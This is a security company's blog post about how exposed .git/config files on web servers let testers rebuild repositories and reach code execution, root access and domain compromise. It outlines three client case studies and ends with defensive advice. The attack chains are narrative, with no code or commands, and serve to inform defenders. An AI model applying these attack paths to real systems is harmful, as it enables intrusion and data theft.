When Automation Isn’t Enough: The True Impact of Human Expertise on Your Perimeter
With new CVEs and emerging threats making headlines daily, it’s easy to get distracted by less public risks that may be critical to your business. But most of those newsworthy vulnerabilities won’t affect your business, and they can often distract security teams from doing their due diligence to lock down other issues affecting the attack surface. But just because a vulnerability isn’t glamorous enough to hit the headlines, doesn’t mean it doesn’t pose a serious risk to your business.
As we’ve been working alongside clients with our Continuous Attack Surface Testing (CAST) offering, we’ve seen a lot of issues that initially seem minor but, upon further investigation, actually present a major risk to our clients. These issues would be missed by scanners because they require real human intervention to analyze and determine how an attacker could use them to pivot deeper into your networks.
Scanners are often pointed at targets, pounding them for every CVE under the sun, but they often miss certain files laying around on web servers such as .git/config files. The existence of those files exposed online is not a vulnerability in and of itself, but it can be an indicator that additional exposures exist and a sign to a human pen tester or red teamer to dig for more related issues. Regardless of the methodology used to identify these files, it is important to treat such exposures as potential high-impact leads and immediately mobilize human experts to conduct a thorough analysis.
LOW-LEVEL ISSUES MIGHT NOT BE AS HARMLESS AS THEY SEEM
CAST’s scanning engine is trained to seek out most of the potentially sensitive file types that can be found on web servers. Even if the scanner doesn’t generate a lead, our Operators still do a sanity check and look for these file types. A .git/config file found on a server is a great indicator that a git repository potentially exists on the server. From here, the Operator begins the process of rebuilding the repository index and recovering as many files as possible. A recovered repository might only be partial, but in most cases even a few recovered files can present valuable vulnerabilities for the Operator to further investigate. Once recovery is complete, Operators can then focus on analyzing the repo’s contents. Typically, two of the most severe findings within those contents are as follows:
- Vulnerabilities that exist in code, which are revealed by a source -> sink analysis. This can lead the Operator to discover a path to remote code execution in the codebase. Remote code execution is one of the most severe threats to an organization’s security. If an attacker succeeded in reaching this point, the results could be devastating.
- Hardcoded credentials left inside the codebase, which can be easily recovered and used against the target in different ways. Most commonly, these are database credentials or AWS keys, which would allow an attacker full or partial access to your data or AWS instances.
HOW HUMAN EXPERTISE HAS FOUND SEEMINGLY LOW RISK ISSUES THAT PRESENT BIG RISKS
These use cases present real-world examples that demonstrate how human expertise was required to identify risks that scanners might flag, but not explore to understand related issues that an attacker might exploit.
Use Case #1: A CAST Operator discovered a git repository with a custom written PHP application, and found out the developer was using PHP’s eval() function. Once the Operator figured out a way to pass his crafted payload to the eval() function, he was able to get shell access on the box and recover additional data from the server.
Impact: When shell access is acquired on a system, an attacker can elevate privileges and gain root access on the host. This can lead to additional data loss, such as full access to a local database. In other cases, attackers may choose to pivot to other systems on the network to expand their foothold.
Use Case #2: After recovering a partial repository, a CAST Operator located a configuration file with database credentials for the application. A quick review of the open ports on the host revealed that no database service was listening externally. At first glance, this meant that the credentials recovered weren’t as useful. However, the Operator intuitively decided to try the database credentials to establish an SSH connection to the target. He was not only granted access, but was able to elevate to root-level access on the box due to the user being included in the sudoers file with full access.
Impact: With this root-level access, the Operator demonstrated how an attacker could recover encryption keys to the database and decrypt the personally identifiable information of the nearly 3 million users that were stored in that database.
Use Case #3: Partial repository recovery once again led an Operator to uncover AWS keys from a config file. Using an open source AWS post-exploitation tool, the Operator was able to get remote code execution on the organization’s domain controller. At this point, the Operator exfiltrated and cracked numerous hashes from the domain controller – and recovered plaintext passwords for many of the network users.
Impact: The Operator could log into users’ corporate accounts, lock them out of those accounts, and read confidential communications, such as email or instant messages and chats.
As these three use cases clearly show, the level of damage that a simple .git/config file exposure can cause is extraordinary – and much more than immediately apparent.
HOW CAN YOU PLAY DEFENSE AGAINST THESE TYPES OF ATTACKS?
After reading through the above, you probably are concerned about the level of risk your business faces from these low-level issues. Below are some of the tried-and-true defensive security measures organizations can use to prevent this level of damage on their attack surface.
- Discourage credential reuse. This is one of the most commonly made mistakes in organizations – employees are bound to reuse credentials at one point or another. It’s critical, though, that your employees use unique passwords for each service/environment.
- Disallow directory listing on web servers. By doing this, you will prevent anyone from discovering that the file is even there in the first place.
- Avoid using hard-coded credentials in code. Sensitive data such as credentials or encryption keys must be stored using the appropriate mechanisms.
While these issues might not be those glamorous vulnerabilities you’ll see in the headlines, they can cause just as much – if not more – damage than the emerging threats trending on Twitter. These issues tend to be more widespread across companies and attackers know how to use open source tools to exploit them. Shore up your security defenses today and train your teams on best practices and proper configurations that can help minimize your organization’s risk of such issues.
If you want to chat with our team about how our CAST solution can help, we’re happy to give you a demo and answer any questions.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
Recommended Posts
You might be interested in these related posts.
Oct 15, 2024
Off the Fox Den Bookshelf: Security and Tech Books We Love
Sep 17, 2024
Navigating DORA Compliance: A Comprehensive Approach to Threat-Led Penetration Testing
Aug 28, 2024
Offensive Security Under the EU Digital Operational Resilience Act (DORA)
Aug 13, 2024
Manipulating the Mind: The Strategy and Practice of Social Engineering